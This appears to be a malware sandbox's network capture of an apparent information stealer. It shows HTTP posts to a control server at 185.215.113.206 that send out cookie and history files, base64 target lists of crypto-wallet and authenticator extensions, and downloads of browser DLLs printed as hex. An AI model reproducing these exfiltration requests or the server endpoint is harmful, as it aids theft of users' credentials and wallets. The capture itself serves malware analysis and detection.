Nov 11, 2024 01:14:00.639821053 CET	1236	IN	Data Raw: 61 57 70 74 5a 32 35 73 62 57 70 6c 5a 57 64 71 59 57 64 73 62 57 56 77 59 6d 31 77 61 33 42 70 66 44 46 38 4d 48 77 77 66 46 52 79 5a 58 70 76 63 69 42 51 59 58 4e 7a 64 32 39 79 5a 43 42 4e 59 57 35 68 5a 32 56 79 66 47 6c 74 62 47 39 70 5a 6d Data Ascii: aWptZ25sbWplZWdqYWdsbWVwYm1wa3BpfDF8MHwwfFRyZXpvciBQYXNzd29yZCBNYW5hZ2VyfGltbG9pZmtnamFnZ2hubmNqa2hnZ2RoYWxtY25ma2xrfDF8MHwwfEF1dGhlbnRpY2F0b3J8YmhnaG9hbWFwY2RwYm9ocGhpZ29vb2FkZGlucGtiYWl8MXwwfDB8QXV0aHl8Z2FlZG1qZGZtbWFoaGJqZWZjYmdhb2xoaGFubGF
Nov 11, 2024 01:14:00.639832973 CET	1236	IN	Data Raw: 61 57 4a 73 61 33 77 77 66 44 42 38 4d 58 78 55 63 6e 56 7a 64 43 42 58 59 57 78 73 5a 58 52 38 5a 57 64 71 61 57 52 71 59 6e 42 6e 62 47 6c 6a 61 47 52 6a 62 32 35 6b 59 6d 4e 69 5a 47 35 69 5a 57 56 77 63 47 64 6b 63 47 68 38 4d 58 77 77 66 44 Data Ascii: aWJsa3wwfDB8MXxUcnVzdCBXYWxsZXR8ZWdqaWRqYnBnbGljaGRjb25kYmNiZG5iZWVwcGdkcGh8MXwwfDB8UmlzZSAtIEFwdG9zIFdhbGxldHxoYmJnYmVwaGdvamlrYWpoZmJvbWhsbW1vbGxwaGNhZHwxfDB8MHxSYWluYm93IFdhbGxldHxvcGZnZWxtY21iaWFqYW1lcG5tbG9pamJwb2xlaWFtYXwxfDB8MHxOaWdodGx
Nov 11, 2024 01:14:00.639851093 CET	636	IN	Data Raw: 62 57 70 69 59 6d 39 6e 5a 6d 6c 70 59 57 39 6d 63 47 68 69 61 6d 64 6a 61 47 68 38 4d 58 77 77 66 44 42 38 56 6d 56 75 62 32 30 67 56 32 46 73 62 47 56 30 66 47 39 71 5a 32 64 74 59 32 68 73 5a 32 68 75 61 6d 78 68 63 47 31 6d 59 6d 35 71 61 47 Data Ascii: bWpiYm9nZmlpYW9mcGhiamdjaGh8MXwwfDB8VmVub20gV2FsbGV0fG9qZ2dtY2hsZ2huamxhcG1mYm5qaG9sZmpraWlkYmNofDF8MHwwfFB1bHNlIFdhbGxldCBDaHJvbWl1bXxjaW9qb2Nwa2NsZmZsb21iYmNmaWdjaWpqY2JrbWhhZnwxfDB8MHxNYWdpYyBFZGVuIFdhbGxldHxta3BlZ2prYmxra2VmYWNmbm1rYWpjam1
Nov 11, 2024 01:14:00.640305996 CET	204	IN	Data Raw: 62 47 56 30 66 47 35 77 61 48 42 73 63 47 64 76 59 57 74 6f 61 47 70 6a 61 47 74 72 61 47 31 70 5a 32 64 68 61 32 6c 71 62 6d 74 6f 5a 6d 35 6b 66 44 46 38 4d 48 77 77 66 45 31 35 56 47 39 75 56 32 46 73 62 47 56 30 66 47 5a 73 5a 47 5a 77 5a 32 Data Ascii: bGV0fG5waHBscGdvYWtoaGpjaGtraG1pZ2dha2lqbmtoZm5kfDF8MHwwfE15VG9uV2FsbGV0fGZsZGZwZ2lwZm5jZ25kZm9sY2JrZGVla25iYmJuaGNjfDF8MHwwfFVuaXN3YXAgRXh0ZW5zaW9ufG5ucG1mcGxrZm9nZnBtY25ncGxobmJkbm5pbG1jZGNnfDF8MHwwfA==
Nov 11, 2024 01:14:00.641608953 CET	470	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FIEHIIIJDAAAAAAKECBF Host: 185.215.113.206 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 46 49 45 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 38 66 39 36 37 38 65 32 66 37 66 64 39 30 61 66 65 32 61 31 33 31 39 35 32 37 39 63 31 61 63 37 62 38 62 62 37 61 37 31 37 30 35 36 65 30 66 34 62 61 36 63 66 32 36 65 38 61 30 34 31 65 30 35 32 31 39 32 62 38 30 0d 0a 2d 2d 2d 2d 2d 2d 46 49 45 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 46 49 45 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 2d 2d 0d 0a Data Ascii: ------FIEHIIIJDAAAAAAKECBFContent-Disposition: form-data; name="token"d8f9678e2f7fd90afe2a13195279c1ac7b8bb7a717056e0f4ba6cf26e8a041e052192b80------FIEHIIIJDAAAAAAKECBFContent-Disposition: form-data; name="message"fplugins------FIEHIIIJDAAAAAAKECBF--
Nov 11, 2024 01:14:00.922962904 CET	335	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:14:00 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 108 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 4d 48 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 42 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 Data Ascii: TWV0YU1hc2t8MHx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDB8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb218
Nov 11, 2024 01:14:00.939419031 CET	203	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JJECGHJDBFIJJJKEHCBF Host: 185.215.113.206 Content-Length: 6879 Connection: Keep-Alive Cache-Control: no-cache
Nov 11, 2024 01:14:01.730113983 CET	202	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:14:01 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 11, 2024 01:14:01.966722965 CET	94	OUT	GET /68b591d6548ec281/sqlite3.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Nov 11, 2024 01:14:02.245516062 CET	1236	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:14:02 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT ETag: "10e436-5e7ec6832a180" Accept-Ranges: bytes Content-Length: 1106998 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: 0@< .text%&`P`.data\|'@(,@`.rdatapDpFT@`@.bss(`.edata,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49753	185.215.113.206	80	7312	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 01:14:10.312462091 CET	202	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KFHCAEGCBFHJDGCBFHDA Host: 185.215.113.206 Content-Length: 991 Connection: Keep-Alive Cache-Control: no-cache
Nov 11, 2024 01:14:10.312462091 CET	991	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4b 46 48 43 41 45 47 43 42 46 48 4a 44 47 43 42 46 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 38 66 39 36 37 Data Ascii: ------KFHCAEGCBFHJDGCBFHDAContent-Disposition: form-data; name="token"d8f9678e2f7fd90afe2a13195279c1ac7b8bb7a717056e0f4ba6cf26e8a041e052192b80------KFHCAEGCBFHJDGCBFHDAContent-Disposition: form-data; name="file_name"Y29va2llc1xHb
Nov 11, 2024 01:14:11.747387886 CET	203	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:14:11 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 11, 2024 01:14:11.844481945 CET	203	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DBGHDGHCGHCAAKFIIECF Host: 185.215.113.206 Content-Length: 1451 Connection: Keep-Alive Cache-Control: no-cache
Nov 11, 2024 01:14:11.844515085 CET	1451	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 44 42 47 48 44 47 48 43 47 48 43 41 41 4b 46 49 49 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 38 66 39 36 37 Data Ascii: ------DBGHDGHCGHCAAKFIIECFContent-Disposition: form-data; name="token"d8f9678e2f7fd90afe2a13195279c1ac7b8bb7a717056e0f4ba6cf26e8a041e052192b80------DBGHDGHCGHCAAKFIIECFContent-Disposition: form-data; name="file_name"aGlzdG9yeVxHb
Nov 11, 2024 01:14:12.627500057 CET	202	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:14:11 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 11, 2024 01:14:12.641736984 CET	565	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CGDGCFBAEGDHJKEBGCBA Host: 185.215.113.206 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 43 47 44 47 43 46 42 41 45 47 44 48 4a 4b 45 42 47 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 38 66 39 36 37 38 65 32 66 37 66 64 39 30 61 66 65 32 61 31 33 31 39 35 32 37 39 63 31 61 63 37 62 38 62 62 37 61 37 31 37 30 35 36 65 30 66 34 62 61 36 63 66 32 36 65 38 61 30 34 31 65 30 35 32 31 39 32 62 38 30 0d 0a 2d 2d 2d 2d 2d 2d 43 47 44 47 43 46 42 41 45 47 44 48 4a 4b 45 42 47 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 43 47 44 47 43 46 42 41 45 47 44 48 4a 4b 45 42 47 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------CGDGCFBAEGDHJKEBGCBAContent-Disposition: form-data; name="token"d8f9678e2f7fd90afe2a13195279c1ac7b8bb7a717056e0f4ba6cf26e8a041e052192b80------CGDGCFBAEGDHJKEBGCBAContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------CGDGCFBAEGDHJKEBGCBAContent-Disposition: form-data; name="file"------CGDGCFBAEGDHJKEBGCBA--
Nov 11, 2024 01:14:13.421807051 CET	202	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:14:12 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 11, 2024 01:14:13.838046074 CET	565	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HDGIEBGHDAEBGDGCFIID Host: 185.215.113.206 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 48 44 47 49 45 42 47 48 44 41 45 42 47 44 47 43 46 49 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 38 66 39 36 37 38 65 32 66 37 66 64 39 30 61 66 65 32 61 31 33 31 39 35 32 37 39 63 31 61 63 37 62 38 62 62 37 61 37 31 37 30 35 36 65 30 66 34 62 61 36 63 66 32 36 65 38 61 30 34 31 65 30 35 32 31 39 32 62 38 30 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 49 45 42 47 48 44 41 45 42 47 44 47 43 46 49 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 49 45 42 47 48 44 41 45 42 47 44 47 43 46 49 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------HDGIEBGHDAEBGDGCFIIDContent-Disposition: form-data; name="token"d8f9678e2f7fd90afe2a13195279c1ac7b8bb7a717056e0f4ba6cf26e8a041e052192b80------HDGIEBGHDAEBGDGCFIIDContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------HDGIEBGHDAEBGDGCFIIDContent-Disposition: form-data; name="file"------HDGIEBGHDAEBGDGCFIID--
Nov 11, 2024 01:14:14.615104914 CET	202	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:14:13 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 11, 2024 01:14:14.852622032 CET	94	OUT	GET /68b591d6548ec281/freebl3.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Nov 11, 2024 01:14:15.136056900 CET	1236	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:14:14 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "a7550-5e7e950876500" Accept-Ranges: bytes Content-Length: 685392 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
Nov 11, 2024 01:14:15.136076927 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 89 e5 68 4f 01 00 00 e8 f2 0b 08 00 83 c4 04 85 c0 74 0e 89 80 38 01 00 00 83 c0 0f 83 e0 f0 5d c3 68 13 e0 ff ff e8 c7 0b Data Ascii: UhOt8]h1]UWVEtu}UMt"0(h&40jVjjRQP?^_]USWVhO?t0
Nov 11, 2024 01:14:15.136090040 CET	224	IN	Data Raw: 55 07 08 00 83 c4 08 eb ce cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 e4 f8 83 ec 58 89 4c 24 2c 8b 7d 1c a1 b4 30 0a 10 31 e8 89 44 24 50 c7 44 24 3c 10 00 00 00 83 ff 18 72 19 89 f8 83 e0 07 75 12 8d 47 f8 3b 45 14 76 14 68 03 e0 ff Data Ascii: UUSWVXL$,}01D$PD$<ruG;Evhh\|$,}uT$4D$0P\|OL$8PVS'D$@?@L$L$D
Nov 11, 2024 01:14:15.136102915 CET	1236	IN	Data Raw: 24 1c 00 00 00 00 89 44 24 08 c7 44 24 24 00 00 00 00 c7 44 24 20 00 00 00 00 31 d2 31 c9 89 5c 24 28 eb 24 89 c7 8b 44 24 1c 83 c0 01 83 f8 06 8b 54 24 18 8b 4c 24 14 0f 84 e2 01 00 00 89 44 24 1c 8a 44 24 07 04 ff 8b 74 24 38 0f 1f 84 00 00 00 Data Ascii: $D$D$$D$ 11\$($D$T$L$D$D$t$8D$D$@L$T$\|$ L$$\$\$T$1%1%1T$D\|$@\|$t\$(
Nov 11, 2024 01:14:15.136112928 CET	212	IN	Data Raw: c1 09 ca c1 fa 1f f7 db 83 e3 07 31 ff 39 d9 f7 d2 0f 44 fa 89 45 d0 89 45 dc 89 ca f7 da c1 fa 1f f7 d2 8b 45 1c 80 7c 30 f7 01 19 db 09 d3 b8 01 00 00 00 29 c8 c1 f8 1f 8b 55 1c 80 7c 32 f6 01 19 d2 f7 d0 09 c2 21 da 21 fa b8 02 00 00 00 29 c8 Data Ascii: 19DEEE\|0)U\|2!!)]\|3)\|3!)}\|7!!)U\|2)\|2!!)
Nov 11, 2024 01:14:15.136126041 CET	1236	IN	Data Raw: 4d 1c 80 7c 31 f0 01 19 c9 09 c1 85 ca 74 2f 8b 45 10 8b 55 d0 89 10 b9 03 e0 ff ff 3b 55 14 8b 5d d4 77 22 31 ff 8b 45 0c 39 c6 74 3a 52 56 50 e8 20 01 08 00 eb 2d bf ff ff ff ff eb 3a b9 02 e0 ff ff 8b 5d d4 51 e8 73 00 08 00 83 c4 04 bf ff ff Data Ascii: M\|1t/EU;U]w"1E9t:RVP -:]QsE9uSjPEtSP\M1$^_[]USWVut:}t$FHjShjVPt^_[]^_[]USWV}tVEG
Nov 11, 2024 01:14:15.136136055 CET	1236	IN	Data Raw: 01 00 00 6a 00 56 e8 34 fc 07 00 83 c4 0c eb 25 85 ff 74 15 89 c8 89 f1 89 d6 8b 55 10 56 50 e8 64 fc ff ff 83 c4 10 eb 6e 8d 46 08 89 45 ec 8b 46 08 89 45 f0 c7 46 08 00 00 00 00 89 5e 04 8b 4b 04 ff 15 00 80 0a 10 ff d1 89 06 bb ff ff ff ff 85 Data Ascii: jV4%tUVPdnFEFEF^Kt=Uuu#t>t FHjWEM1^_[]USWVu>FHW>FHXSVW^_[]USWVu}
Nov 11, 2024 01:14:15.136148930 CET	424	IN	Data Raw: 00 83 c4 0c 01 f7 29 f3 39 f3 77 e8 53 ff 75 08 57 e8 97 f7 07 00 83 c4 0c 0f b6 8d f0 fe ff ff 8b b5 ec fe ff ff 8a 04 0e 88 06 c6 04 0e 00 b8 02 00 00 00 0f b6 54 06 ff 0f b6 f9 01 d7 0f b6 8c 05 ef fe ff ff 01 f9 0f b6 f9 0f b6 1c 3e 88 5c 06 Data Ascii: )9wSuWT>\>=t%>>fM1^_[]U}thuo]UVuE9sh;UMVuPu
Nov 11, 2024 01:14:15.136389971 CET	1236	IN	Data Raw: d6 0f b6 f6 8a 24 37 88 24 0f 88 14 37 8b 75 14 00 d4 0f b6 cc 8b 5d 10 8a 53 01 32 14 0f 8b 4d e4 88 51 01 83 fe 02 0f 84 e8 00 00 00 8b 45 ec 04 03 0f b6 c8 8b 7d f0 8a 14 0f 00 d6 0f b6 f6 8a 24 37 88 24 0f 88 14 37 8b 75 14 00 d4 0f b6 cc 8b Data Ascii: $7$7u]S2MQE}$7$7u]S2MQE}$7$7u]S2MQttE}$7$7u]S2MQt<E}$7$
Nov 11, 2024 01:14:15.962229013 CET	94	OUT	GET /68b591d6548ec281/mozglue.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Nov 11, 2024 01:14:16.245887041 CET	1236	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:14:16 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "94750-5e7e950876500" Accept-Ranges: bytes Content-Length: 608080 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B
Nov 11, 2024 01:14:16.439289093 CET	95	OUT	GET /68b591d6548ec281/msvcp140.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Nov 11, 2024 01:14:16.723002911 CET	1236	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:14:16 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "6dde8-5e7e950876500" Accept-Ranges: bytes Content-Length: 450024 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
Nov 11, 2024 01:14:16.886181116 CET	91	OUT	GET /68b591d6548ec281/nss3.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Nov 11, 2024 01:14:17.170645952 CET	1236	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:14:17 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "1f3950-5e7e950876500" Accept-Ranges: bytes Content-Length: 2046288 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 